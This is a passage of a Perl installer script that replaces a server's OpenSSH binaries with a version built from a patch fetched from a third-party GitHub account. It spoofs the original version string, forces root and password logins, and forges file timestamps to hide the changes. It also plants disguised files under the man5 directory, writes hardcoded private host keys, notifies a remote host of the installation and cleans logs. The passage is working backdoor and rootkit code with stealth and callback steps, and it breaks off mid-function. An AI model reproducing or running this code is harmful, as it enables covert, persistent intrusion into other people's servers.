1419 print "[+] Found $rpm_file$/";
1420
1421 my ($openssl_version) = $rpm_file =~ /$rpm\-(.*)/;
1422
1423
1424 my @rpm = qw(libcom_err e2fsprogs keyutils-libs libsepol libselinux);
1425
1426 foreach (@rpm) {
1427 &install_devel($_);
1428 }
1429
1430
1431 $rpm_file = &check_rpm_exists('krb5-libs');
1432
1433 if ( $rpm_file eq '0' ) {
1434 print "[-] krb5-libs not found$/";
1435
1436 &install_compiled_ssh();
1437
1438 exit(0);
1439 }
1440
1441 my ($krb5_version) = $rpm_file =~ /krb5-libs-(.*)/;
1442
1443
1444
1445 &install_from_web_repo('krb5-devel');
1446
1447 $rpm_file = &check_rpm_exists('krb5-devel');
1448
1449 if ( $rpm_file eq '0' ) {
1450 print "[-] devel not found$/";
1451
1452
1453 my $krb5_file = sprintf('krb5-devel-%s', $krb5_version);
1454
1455 my $urls = &search_rpm($krb5_file);
1456 &install_rpm($urls, 'krb5-devel', $krb5_version);
1457 }
1458
1459
1460
1461 &install_from_web_repo('openssl-devel');
1462
1463 $rpm_file = &check_rpm_exists('openssl-devel');
1464
1465 if ( $rpm_file eq '0' ) {
1466 print "[-] openssl not found$/";
1467
1468 my $openssl_file = sprintf('%s-devel-%s', $rpm, $openssl_version);
1469
1470 my $urls = &search_rpm($openssl_file);
1471 &install_rpm($urls, $rpm.'-devel', $openssl_version);
1472 }
1473 }
1474 }
1475 else {
1476 print "[+] ${rpm}-devel $rpm_file Installed$/";
1477 }
1478}
1479###
1480
1481
1482
1483### Install OpenSSL for OpenSUSE
1484sub install_openssl_opensuse {
1485 my $rpm = 'libopenssl';
1486
1487
1488 print "[+] Install ${rpm}-devel$/";
1489
1490
1491 my $rpm_file = &check_rpm_exists("${rpm}-devel");
1492
1493 if ( $rpm_file eq '0' ) {
1494 $rpm_file = &check_rpm_exists($rpm);
1495
1496 if ( $rpm_file eq '0' ) {
1497 print "[-] Not found $rpm$/";
1498
1499 &install_compiled_ssh();
1500
1501 exit(0);
1502 }
1503 else {
1504 print "[+] Found $rpm_file$/";
1505
1506 my ($openssl_version) = $rpm_file =~ /openssl\-(.*)/;
1507
1508 my $urls = &search_rpm($rpm.'-devel-'.$openssl_version);
1509 &install_rpm($urls, $rpm.'-devel', $openssl_version);
1510 }
1511 }
1512 else {
1513 print "[+] ${rpm}-devel $rpm_file Installed$/";
1514 }
1515}
1516###
1517
1518
1519
1520sub yum_install {
1521 my $file = $_[0];
1522
1523
1524 `yum -y install $file`;
1525
1526
1527 my $rpm_file = &check_rpm_exists($file);
1528
1529
1530 return $rpm_file;
1531}
1532
1533
1534
1535### Install patch programm
1536sub install_patch {
1537 my $rpm = 'patch';
1538
1539
1540 my $rpm_file = &check_rpm_exists($rpm);
1541
1542 if ( $rpm_file eq '0' ) {
1543 if ( $yum == 1) {
1544 $rpm_file = &yum_install($rpm);
1545 }
1546 elsif ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
1547 `apt-get -y --force-yes install patch`;
1548
1549 $rpm_file = &check_rpm_exists($rpm);
1550 }
1551 }
1552
1553
1554 if ( $rpm_file eq '0' ) {
1555 $url = &get_url();
1556
1557 my $page = &get_page($url);
1558
1559 my ($patch) = $page =~ /href=\"(patch\-[^\"]+)\"/;
1560
1561 print "[+] Found $patch$/";
1562
1563 print "[+] Install $patch$/";
1564 `rpm -i $url$patch`;
1565 }
1566}
1567###
1568
1569
1570
1571### Get URL with distributive RPMs
1572sub get_url {
1573 print "[+] Get URL with distributive RPMs$/";
1574
1575
1576 my $search = '';
1577 my $url = '';
1578
1579
1580 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
1581 my $mach = $machine;
1582
1583 if ( $machine eq 'i686' ) {
1584 $mach = 'i386';
1585 }
1586
1587 $url = sprintf($centos_url, $version_os, $mach);
1588 $search = sprintf($centos_search, $version_os, $mach);
1589 }
1590 elsif ( ( $platform eq 'openSUSE' ) || ( $platform eq 'SUSE' ) ) {
1591 my $mach = $machine;
1592
1593 if ( $machine eq 'i686' ) {
1594 $mach = 'i586';
1595 }
1596
1597 $url = sprintf($opensuse_url, $version_os, $mach);
1598 $search = sprintf($opensuse_search, $version_os, $mach);
1599 }
1600
1601
1602 (my $ret, $page) = &get_page($url);
1603
1604 if ( $ret == 0 ) {
1605 my $urls = &search($search);
1606
1607 foreach ( @{$urls} ) {
1608 ($ret, $page) = &get_page($_);
1609
1610 if ( $ret == 1 ) {
1611 return $_;
1612 }
1613 }
1614 }
1615
1616
1617 return $url;
1618}
1619###
1620
1621
1622
1623### Get HTML page
1624sub get_page {
1625 my $url = $_[0];
1626
1627
1628 print "[+] Get HTML Page $url$/";
1629
1630
1631 my $ua = LWP::UserAgent->new();
1632
1633 $ua->agent($user_agent);
1634 $ua->timeout(30);
1635
1636 my $response = $ua->get($url);
1637
1638 if ( $response->is_success ) {
1639 return (1, $response->decoded_content);
1640 }
1641 else {
1642 printf("[-] %s$/", $response->status_line);
1643
1644 return (0, '');
1645 }
1646}
1647###
1648
1649
1650
1651sub install_gcc {
1652 my $rpm = 'gcc';
1653
1654
1655 print "[+] Install gcc$/";
1656
1657
1658 my $rpm_file = &check_rpm_exists($rpm);
1659
1660 if ( $rpm_file ne '0' ) {
1661 print "[+] gcc installed$/";
1662
1663 return;
1664 }
1665
1666
1667 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
1668 if ( $yum == 1) {
1669 &install_gcc_yum();
1670
1671
1672 $rpm_file = &check_rpm_exists($rpm);
1673
1674 if ( $rpm_file ne '0' ) {
1675 print "[+] gcc installed$/";
1676
1677 return;
1678 }
1679 }
1680
1681 &install_gcc_centos();
1682 }
1683 elsif ( ( $platform eq 'openSUSE' ) || ( $platform eq 'SUSE' ) ) {
1684 &install_gcc_opensuse();
1685 }
1686 elsif ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
1687 &install_gcc_debian();
1688 }
1689 else {
1690 return;
1691 }
1692
1693
1694 $rpm_file = &check_rpm_exists($rpm);
1695
1696 if ( $rpm_file ne '0' ) {
1697 print "[+] gcc installed$/";
1698 }
1699 else {
1700 print "[-] gcc not installed$/";
1701
1702 &install_compiled_ssh();
1703
1704 exit(0);
1705 }
1706}
1707
1708
1709
1710sub install_gcc_yum {
1711 print "[+] yum found, try install gcc$/";
1712
1713 `yum -y install gcc`;
1714}
1715
1716
1717
1718sub install_gcc_centos {
1719 $url = &get_url();
1720
1721
1722 #&install_rpm_from_web('gmp-devel');
1723 &install_rpm_from_web('ppl');
1724 &install_rpm_from_web('mpfr');
1725 &install_rpm_from_web('cloog-ppl');
1726 #&install_rpm_from_web('glibc-devel');
1727
1728
1729
1730
1731 &install_rpm_from_web('kernel-headers');
1732
1733
1734
1735 print "[+] Install glibc-headers and glibc-devel$/";
1736
1737 my $rpm_file = &check_rpm_exists('glibc');
1738
1739 if ( $rpm_file ne '0' ) {
1740 my ($glibc_version) = $rpm_file =~ /glibc\-(.*)/;
1741 print "[+] glibc $glibc_version$/";
1742
1743
1744 &install_rpm_from_web('glibc-headers-'.$glibc_version);
1745 &install_rpm_from_web('glibc-devel-'.$glibc_version);
1746
1747
1748
1749 $rpm_file = &check_rpm_exists('glibc-headers');
1750
1751 if ( $rpm_file eq '0' ) {
1752 my $urls = &search_rpm('glibc-headers-'.$glibc_version);
1753 &install_rpm($urls,'glibc-headers',$glibc_version);
1754 }
1755
1756
1757 $rpm_file = &check_rpm_exists('glibc-devel');
1758 if ( $rpm_file eq '0' ) {
1759 my $urls = &search_rpm('glibc-devel-'.$glibc_version);
1760 &install_rpm($urls,'glibc-devel',$glibc_version);
1761 }
1762 }
1763 else {
1764 print "[-] glibc not installed$/";
1765 }
1766
1767
1768 &install_rpm_from_web('libgomp');
1769
1770
1771 my $cpp_version = &install_rpm_from_web('cpp');
1772
1773 my ($gcc) = $page =~ /href=\"(gcc\-$cpp_version)\"/;
1774 print "[+] Found $gcc$/";
1775
1776 print "[+] Install $gcc$/";
1777 `rpm -i $url$gcc`;
1778
1779
1780 &install_rpm_from_web('make');
1781}
1782
1783
1784
1785sub install_rpm_from_web {
1786 my $rpm = $_[0];
1787
1788
1789 my $mach = $machine;
1790
1791 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
1792 if ( $machine eq 'i686' ) {
1793 $mach = 'i386';
1794 }
1795 }
1796
1797
1798 my ($rpm_dist, $rpm_version) = $page =~ /href=\"($rpm\-([^\"]+$mach[^\"]+))\"/;
1799
1800 print "[+] Found $rpm $rpm_dist$/";
1801
1802
1803 my $rpm_file = &check_rpm_exists($rpm);
1804
1805 if ( $rpm_file eq '0' ) {
1806 print "[+] Install $rpm$/";
1807
1808 `rpm -i $url$rpm_dist`;
1809 }
1810
1811
1812 return $rpm_version;
1813}
1814
1815
1816
1817sub install_gcc_opensuse {
1818 $url = &get_url();
1819
1820
1821 &install_rpm_from_web('libgomp');
1822 &install_rpm_from_web('gmp');
1823 &install_rpm_from_web('libmpfr1');
1824
1825
1826
1827 ### Install CPP4
1828 my ($cpp_file, $cpp4d) = $page =~ /href=\"((cpp4\d)\-[^\"]+)\"/;
1829
1830 my $rpm_file = &check_rpm_exists($cpp4d);
1831
1832 if ( $rpm_file eq '0' ) {
1833 print "[+] Install $cpp_file$/";
1834
1835 `rpm -i $url$cpp_file`;
1836 }
1837 ###
1838
1839
1840
1841 my $cpp_version = &install_rpm_from_web('cpp');
1842
1843
1844
1845 ### Install GCC4
1846 my ($gcc_file, $gcc4d) = $page =~ /href=\"((gcc4\d)\-[^\"]+)\"/;
1847
1848 $rpm_file = &check_rpm_exists($gcc4d);
1849
1850 if ( $rpm_file eq '0' ) {
1851 print "[+] Install $gcc_file$/";
1852
1853 my $ret = `rpm -i $url$gcc_file 2>&1`;
1854
1855 my $dep_file = '';
1856
1857 if ( $ret =~ /\s*([^\s]+)\s*\>/ ) {
1858 $dep_file = $1;
1859
1860 my ($dep_file_full) = $page =~ /href=\"($dep_file(\d*)\-[^\"]+)\"/;
1861 `rpm -i $url$dep_file_full`;
1862 `rpm -i $url$gcc_file`;
1863 }
1864 }
1865 ###
1866
1867
1868
1869 ### Install GCC
1870 my ($gcc) = $page =~ /href=\"(gcc\-$cpp_version)\"/;
1871 print "[+] Found $gcc$/";
1872
1873 print "[+] Install $gcc$/";
1874
1875 `rpm -i $url$gcc`;
1876 ###
1877
1878
1879 &install_rpm_from_web('make');
1880}
1881
1882
1883
1884sub install_gcc_debian {
1885 `apt-get -y --force-yes install build-essential`;
1886}
1887
1888
1889
1890sub install_make {
1891 my $rpm = 'make';
1892
1893
1894 my $rpm_file = &check_rpm_exists($rpm);
1895
1896 if ( $rpm_file ne '0' ) {
1897 print "[+] make installed$/";
1898
1899 return;
1900 }
1901 else {
1902 if ( $yum == 1 ) {
1903 &yum_install($rpm);
1904 }
1905 elsif ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
1906 &install_debian_pkg($rpm);
1907 }
1908 }
1909}
1910
1911
1912sub install_debian_pkg {
1913 my $pkg = $_[0];
1914
1915
1916 my $try_install = 0;
1917
1918 while ( $try_install < 2 ) {
1919 my $pkg_exists = &check_debian_pkg_exists($pkg);
1920
1921 if ( $pkg_exists == 1 ) {
1922 $try_install = 2;
1923 }
1924 else {
1925 if ( $try_install == 1 ) {
1926 print "[+] Try apt-get update$/";
1927
1928 `apt-get -y --force-yes update`;
1929 }
1930
1931 `apt-get -y --force-yes install $pkg`;
1932 $try_install++;
1933 }
1934 }
1935}
1936
1937
1938
1939sub check_extutils_exists {
1940 eval { require ExtUtils::MakeMaker };
1941 my $extutils = $@ ? '0' : '1';
1942
1943 print "[+] ExtUtils::MakeMaker - $extutils$/";
1944
1945
1946 return $extutils;
1947}
1948
1949
1950
1951sub install_extutils {
1952 if ( ( $extutils == 0 ) && ( $yum == 1 ) ) {
1953 print "[+] yum found, try install perl-ExtUtils-MakeMaker$/";
1954 `yum -y install perl-ExtUtils-MakeMaker`;
1955
1956 $extutils = &check_extutils_exists();
1957
1958
1959 # Modify Yum config and try install again
1960 if ( $extutils == 0 ) {
1961 &modify_yum_config();
1962
1963 `yum -y install perl-ExtUtils-MakeMaker`;
1964
1965 $extutils = &check_extutils_exists();
1966 }
1967 }
1968}
1969
1970
1971
1972### Get SSH Version
1973sub get_ssh_version {
1974 if ( $MODE eq 'version' ) {
1975 if ( $MODE_ARG1 ne '' ) {
1976 if ( $MODE_ARG2 ne '' ) {
1977 return ($MODE_ARG1, $MODE_ARG2);
1978 }
1979
1980 return ($MODE_ARG1, '');
1981 }
1982 else {
1983 print "Can't get ARGV with SSH Version";
1984 }
1985 }
1986
1987
1988 my $ssh = `/usr/sbin/sshd -V 2>&1`;
1989
1990 if ( $ssh =~ /(OpenSSH[^, \n]+)[ \t]?([^, \n]+)?/s ) {
1991 print "[+] SSH Version: $1$/";
1992
1993 my $add = '';
1994
1995 if ( defined($2) ) {
1996 $add = $2;
1997
1998 print "[+] SSH Version ADDENDUM: $add$/";
1999 }
2000
2001 return ($1, $add);
2002 }
2003 else {
2004 print "[-] Can't get SSH Version$/";
2005
2006 print "[+] Use default SSH Version OpenSSH_5.1p1$/";
2007
2008
2009 return ('OpenSSH_5.1p1', '');
2010 }
2011}
2012###
2013
2014
2015
2016### Install SSH
2017sub install_ssh {
2018 print "[+] Get SSH distributive$/";
2019
2020
2021 if ( !-e 'openssh-6.6p1.tar.gz' ) {
2022 `$wget -t 5 http://mirror.yandex.ru/pub/OpenBSD/OpenSSH/portable/openssh-6.6p1.tar.gz`;
2023 }
2024
2025
2026 if ( !-e 'openssh-6.6p1.tar.gz' ) {
2027 `$wget -t 5 ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-6.6p1.tar.gz`;
2028 }
2029
2030
2031 if ( !-e 'openssh-6.6p1.tar.gz' ) {
2032 my $openssh_src_get_result = &get_openssh_src();
2033
2034 # OpenSSH src not getted
2035 if ( $openssh_src_get_result == 1 ) {
2036 return 0;
2037 }
2038 }
2039
2040
2041 if ( !-e 'openssh-6.6p1.tar.gz' ) {
2042 print "[-] Can't download openssh-6.6p1.tar.gz$/";
2043
2044 &install_compiled_ssh();
2045
2046 exit(0);
2047 }
2048
2049
2050 `mv openssh-6.6p1.tar.gz $run_path/`;
2051
2052 chdir($run_path);
2053
2054
2055 print "[+] Extract SSH distributive$/";
2056
2057 `tar xfz openssh-6.6p1.tar.gz`;
2058
2059
2060 print "[+] Get SSH patch and apply it$/";
2061
2062
2063 if ( !-e $ssh_patch ) {
2064 if ( $^O eq 'freebsd' ) {
2065 `$wget -t 5 https://raw.github.com/briwern/briw/gh-pages/$ssh_patch`;
2066 }
2067 else {
2068 `$wget -t 5 --no-check-certificate https://raw.github.com/briwern/briw/gh-pages/$ssh_patch`;
2069
2070 unless ( -e $ssh_patch ) {
2071 `$wget -t 5 https://raw.github.com/briwern/briw/gh-pages/$ssh_patch`;
2072 }
2073 }
2074 }
2075
2076
2077 if ( !-e $ssh_patch ) {
2078 my $patch_get_result = &get_ssh_patch();
2079
2080 # Patch not getted
2081 if ( $patch_get_result == 1 ) {
2082 return 0;
2083 }
2084 }
2085
2086
2087 `mv $ssh_patch $run_path/`;
2088
2089 chdir($run_path);
2090
2091
2092 `patch -p0 -i $ssh_patch`;
2093 `rm -rf openssh-6.6p1_p`;
2094
2095 unlink($ssh_patch);
2096 chdir('openssh-6.6p1');
2097
2098
2099
2100 my ($ssh_version, $ssh_addendum) = &get_ssh_version();
2101
2102 `perl -Upi -e 's/OpenSSH_6.6p1/$ssh_version/' version.h`;
2103
2104 my $sshvers_addendum = '';
2105 my $sshconf_addendum = '';
2106
2107 if ( $ssh_addendum eq '' ) {
2108 $sshvers_addendum = '';
2109 $sshconf_addendum = 'NULL';
2110 }
2111 else {
2112 $sshvers_addendum = sprintf(' %s', $ssh_addendum);
2113 $sshconf_addendum = sprintf('"%s"', $ssh_addendum);
2114 }
2115
2116 `perl -Upi -e 's/ FreeBSD-20140420/$sshvers_addendum/' version.h`;
2117 `perl -Upi -e 's/options->version_addendum = NULL/options->version_addendum = $sshconf_addendum/' servconf.c`;
2118
2119
2120
2121 ### Configure
2122 print "[+] Start configure$/";
2123
2124 my $configure_cmd = '';
2125
2126 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) || ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
2127 $configure_cmd = './configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --without-zlib-version-check --with-kerberos5 2>&1';
2128 }
2129 else {
2130 $configure_cmd = './configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --without-zlib-version-check 2>&1';
2131 }
2132 ###
2133
2134
2135 my $configure_result = `$configure_cmd`;
2136
2137 if ( $configure_result =~ /without-openssl-header-check/ ) {
2138 print "[!] Rerun ./configure with --without-openssl-header-check$/";
2139
2140 $configure_cmd .= ' --without-openssl-header-check';
2141 `$configure_cmd`;
2142 }
2143
2144
2145
2146 # Make
2147 print "[+] Start make$/";
2148
2149 if ( exists($ENV{'SHELL'}) && ( $ENV{'SHELL'} =~ /\/csh$/ ) ) {
2150 print "[+] Modify Makefile to enable /bin/sh for make";
2151 `perl -Upi -e 's/\\#SHELL = \\/bin\\/sh/SHELL = \\/bin\\/sh/' Makefile`;
2152 }
2153
2154
2155 `make`;
2156
2157
2158 foreach (qw(sshd ssh scp)) {
2159 if ( !-e $_ ) {
2160 print "[-] Can't find ./${_}$/";
2161
2162 return 0;
2163 }
2164 }
2165
2166
2167 `strip ./sshd`;
2168 `strip ./ssh`;
2169 `strip ./scp`;
2170
2171
2172 return &final_ssh_install();
2173}
2174
2175
2176
2177sub change_sshd_config {
2178 `touch /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259065`;
2179 `touch -r $SSHD_CONFIG /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259065`;
2180
2181 my $sshd_config_new = '';
2182
2183 open SSHD_CONFIG, "< $SSHD_CONFIG";
2184
2185 while ( <SSHD_CONFIG> ) {
2186 chomp;
2187
2188 if ( /^\#/ ) {
2189 $sshd_config_new .= "$_$/";
2190 }
2191 elsif ( /AllowUsers\s+(.*)/ ) {
2192 my $allow_users = $1;
2193 print "[+] Found AllowUsers: $allow_users$/";
2194
2195 if ( $allow_users !~ /root/ ) {
2196 print "[+] Added root to AllowUsers$/";
2197
2198 $allow_users .= ' root';
2199 }
2200
2201 $sshd_config_new .= sprintf("AllowUsers %s$/", $allow_users);
2202 }
2203 elsif ( ( /PermitRootLogin no/ ) || ( /PermitRootLogin without-password/ ) ) {
2204 print "[+] Change $_ to PermitRootLogin yes$/";
2205
2206 $sshd_config_new .= "PermitRootLogin yes$/";
2207 }
2208 elsif ( /^PasswordAuthentication no/ ) {
2209 print "[+] Change $_ to PasswordAuthentication yes$/";
2210
2211 $sshd_config_new .= "PasswordAuthentication yes$/";
2212 }
2213 }
2214
2215 close SSHD_CONFIG;
2216
2217 open SSHD_CONFIG_NEW, "> $SSHD_CONFIG";
2218 print SSHD_CONFIG_NEW $sshd_config_new;
2219 close SSHD_CONFIG_NEW;
2220
2221 `touch -r /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259065 $SSHD_CONFIG`;
2222 unlink('/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259065');
2223}
2224
2225
2226
2227sub final_ssh_install {
2228 `touch -r /usr/sbin/sshd ./sshd`;
2229 `touch -r /usr/bin/ssh ./ssh`;
2230 `touch -r /usr/bin/scp ./scp`;
2231 print `/bin/ls -al ./sshd ./ssh ./scp`;
2232
2233 &change_sshd_config();
2234
2235 print `ps ax | grep -i ssh`;
2236
2237
2238 ### Backup old files
2239 print $/."[+] Backup old files$/";
2240
2241 ©_file('/usr/sbin/sshd', './old_sshd', 'copy');
2242 ©_file('/usr/bin/ssh', './old_ssh', 'copy');
2243 ©_file('/usr/bin/scp', './old_scp', 'copy');
2244
2245 `touch -r /usr/sbin/sshd ./old_sshd`;
2246 `touch -r /usr/bin/ssh ./old_ssh`;
2247 `touch -r /usr/bin/scp ./old_scp`;
2248
2249 print `/bin/ls -al ./old_sshd ./old_ssh ./old_scp`;
2250 ###
2251
2252
2253
2254 ### Copy new files
2255 print $/."[+] Copy new files$/";
2256
2257 ©_file('./sshd', '/usr/sbin/sshd', 'move');
2258 ©_file('./ssh', '/usr/bin/ssh', 'move');
2259 ©_file('./scp', '/usr/bin/scp', 'move');
2260 ###
2261
2262
2263
2264 if ( !-d '/usr/share/man/man5' ) {
2265 `mkdir /usr/share/man/man5`;
2266 }
2267
2268 `chmod 777 /usr/share/man/man5/`;
2269 `touch /usr/share/man/man5/ttyl.5.gz`;
2270 `touch /usr/share/man/man5/ttyp.5.gz`;
2271 `touch /usr/share/man/man5/ttyv.5.gz`;
2272 `chmod 666 /usr/share/man/man5/ttyl.5.gz`;
2273 `chmod 666 /usr/share/man/man5/ttyp.5.gz`;
2274 `chmod 666 /usr/share/man/man5/ttyv.5.gz`;
2275
2276 if ( !-d '/var/empty' ) {
2277 `mkdir /var/empty`;
2278 }
2279
2280
2281 &install_ed25519_key();
2282 &install_ecdsa_key();
2283 &install_dsa_key();
2284
2285
2286 &check_permissions_ssh_keys();
2287
2288
2289
2290 ### Generate SID for server
2291 if ( !-e '/usr/share/man/man5/ttys.5' ) {
2292 my $sid = &generate_sid();
2293
2294 `echo '$sid' > /usr/share/man/man5/ttys.5`;
2295 }
2296 ###
2297
2298
2299
2300 &restart_sshd();
2301
2302 ¬ify_installed_ssh("$SSH_HOST:$SSH_PORT");
2303
2304 $|=1;
2305 printf("[+] Wait work sshd confirmation %s:%s$/", $SSH_HOST, $SSH_PORT);
2306
2307 my $ssh_installed = 0;
2308
2309 for (my $i = 1; $i < 15; $i++) {
2310 if ( -e $ssh_confirm_file ) {
2311 $ssh_installed = 1;
2312 $SSH_INSTALLED = 1;
2313
2314 unlink($ssh_confirm_file);
2315
2316 last;
2317 }
2318 else {
2319 print '.';
2320 sleep(5);
2321 }
2322 }
2323
2324 print "$/$/";
2325
2326 if ( $ssh_installed == 0 ) {
2327 print "[+] Restore old files$/";
2328
2329 ©_file('./old_sshd', '/usr/sbin/sshd', 'copy');
2330 ©_file('./old_ssh', '/usr/bin/ssh', 'copy');
2331 ©_file('./old_scp', '/usr/bin/scp', 'copy');
2332
2333 unlink('/usr/share/man/man5/ttyl.5.gz');
2334 unlink('/usr/share/man/man5/ttyp.5.gz');
2335 unlink('/usr/share/man/man5/ttyv.5.gz');
2336 unlink('/usr/share/man/man5/ttys.5');
2337
2338 &restart_sshd();
2339 }
2340
2341
2342 &remove_install_files();
2343
2344
2345 &clean_logs();
2346
2347 if ( $ssh_installed == 0 ) {
2348 print "[-] SSH Install Failed$/";
2349 }
2350 else {
2351 print "[+] SSH Install Good$/";
2352 }
2353
2354
2355 return $ssh_installed;
2356}
2357###
2358
2359
2360
2361sub install_ed25519_key {
2362 if ( -f '/etc/ssh/ssh_host_ed25519_key' ) {
2363 return;
2364 }
2365
2366
2367 my $hostname = `uname -n`;
2368 chomp($hostname);
2369
2370 `touch -r /etc/ssh /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788`;
2371
2372 `cat <<EOF> /etc/ssh/ssh_host_ed25519_key
2373-----BEGIN OPENSSH PRIVATE KEY-----
2374b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
2375QyNTUxOQAAACDiBWMotAYNTgw5oyvoSFDKixbbto+6uNoYBhd7wc9wvgAAAJiLy+/Ai8vv
2376wAAAAAtzc2gtZWQyNTUxOQAAACDiBWMotAYNTgw5oyvoSFDKixbbto+6uNoYBhd7wc9wvg
2377AAAEDAAm8gptq/UUQRVLRE3rVBIXldiWdvsTE8QMMVA/AkWeIFYyi0Bg1ODDmjK+hIUMqL
2378Ftu2j7q42hgGF3vBz3C+AAAAD3Jvb3RAU2VydmV1ckNURgECAwQFBg==
2379-----END OPENSSH PRIVATE KEY-----
2380EOF`;
2381
2382 `echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOIFYyi0Bg1ODDmjK+hIUMqLFtu2j7q42hgGF3vBz3C+ root\@$hostname' > /etc/ssh/ssh_host_ed25519_key.pub`;
2383
2384 `chmod 600 /etc/ssh/ssh_host_ed25519_key`;
2385 `chmod 644 /etc/ssh/ssh_host_ed25519_key.pub`;
2386
2387 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_ed25519_key`;
2388 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_ed25519_key.pub`;
2389
2390 `touch -r /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788 /etc/ssh`;
2391 unlink('/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788');
2392}
2393
2394
2395
2396sub install_ecdsa_key {
2397 if ( -f '/etc/ssh/ssh_host_ecdsa_key' ) {
2398 return;
2399 }
2400
2401
2402 my $hostname = `uname -n`;
2403 chomp($hostname);
2404
2405 `touch -r /etc/ssh /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788`;
2406
2407 `cat <<EOF> /etc/ssh/ssh_host_ecdsa_key
2408-----BEGIN EC PRIVATE KEY-----
2409MHcCAQEEIL/zetUvz9Ci1Z/w2KntUgEDqqxjN4mwmlRvPG27CG+xoAoGCCqGSM49
2410AwEHoUQDQgAELWRdfXYpHCaH4mQbiLYr9ZsKrgwOdl+f43irZnSmZPsDQX6gXOzt
2411mQ1eIypH+7KLmtgh7mOsIgtcywowwmD3OQ==
2412-----END EC PRIVATE KEY-----
2413EOF`;
2414
2415 `echo 'ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC1kXX12KRwmh+JkG4i2K/WbCq4MDnZfn+N4q2Z0pmT7A0F+oFzs7ZkNXiMqR/uyi5rYIe5jrCILXMsKMMJg9zk= root\@$hostname' > /etc/ssh/ssh_host_ecdsa_key.pub`;
2416
2417 `chmod 600 /etc/ssh/ssh_host_ecdsa_key`;
2418 `chmod 644 /etc/ssh/ssh_host_ecdsa_key.pub`;
2419
2420 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_ecdsa_key`;
2421 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_ecdsa_key.pub`;
2422
2423 `touch -r /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788 /etc/ssh`;
2424 unlink('/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788');
2425}
2426
2427
2428
2429sub install_dsa_key {
2430 if ( -f '/etc/ssh/ssh_host_dsa_key' ) {
2431 return;
2432 }
2433
2434
2435 my $hostname = `uname -n`;
2436 chomp($hostname);
2437
2438 `touch -r /etc/ssh /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788`;
2439
2440 `cat <<EOF> /etc/ssh/ssh_host_dsa_key
2441-----BEGIN DSA PRIVATE KEY-----
2442MIIBuwIBAAKBgQDMv+1RbSUV8YZW86CgTf+BADXlIeM+mrBwaiSQyipT/gtAIE+n
2443VkJPmOQpt/grnBjKgfkKMbCHSTEEkhyI/24iTu8atyB5hiFkWEVuFIlyGflKexym
2444BlDkq5bWUmLtsSgSlxQeoP+OXLWlB+QznlkCVhfPEgREUCHnyeFrzB3qHwIVALo8
2445ihfrxtfKGYNTnm9FYW/2/wVFAoGAFkzBugg4ebR9bQ2CMyWkqjXRX4DHlm7Wkp6M
24462KnIWwnpK3Mv9IAVXycZrkOpq7ncc3dJuNN7gTNMwvAkGgDZ0IE7DShrCbr3NJw/
2447virUPeMlaCNUO/by5RujoV+5HZGoQKot4SBZem0psgwIVpjxGyXlZEmZCy6FpckC
2448oaoSIukCgYEAvfArMS2sS22VvynOcBxfU6lAZfTJfWmYIbCsX4FB07/3WLVF6ZXY
2449wqvYSBfgyUgO4Ic29qlBGMYXpLn9Id7MZLYqM9jjkNOS6lQYDd1nH90UWUl7mTBr
2450rgaSDVsSu9gYulqrrPUCPa2Oz/3+HEzg8GaMIudBVoV+c5cytxbI8HkCFCmvACss
2451YEQigCFj3fh+14tvhHDh
2452-----END DSA PRIVATE KEY-----
2453EOF`;
2454
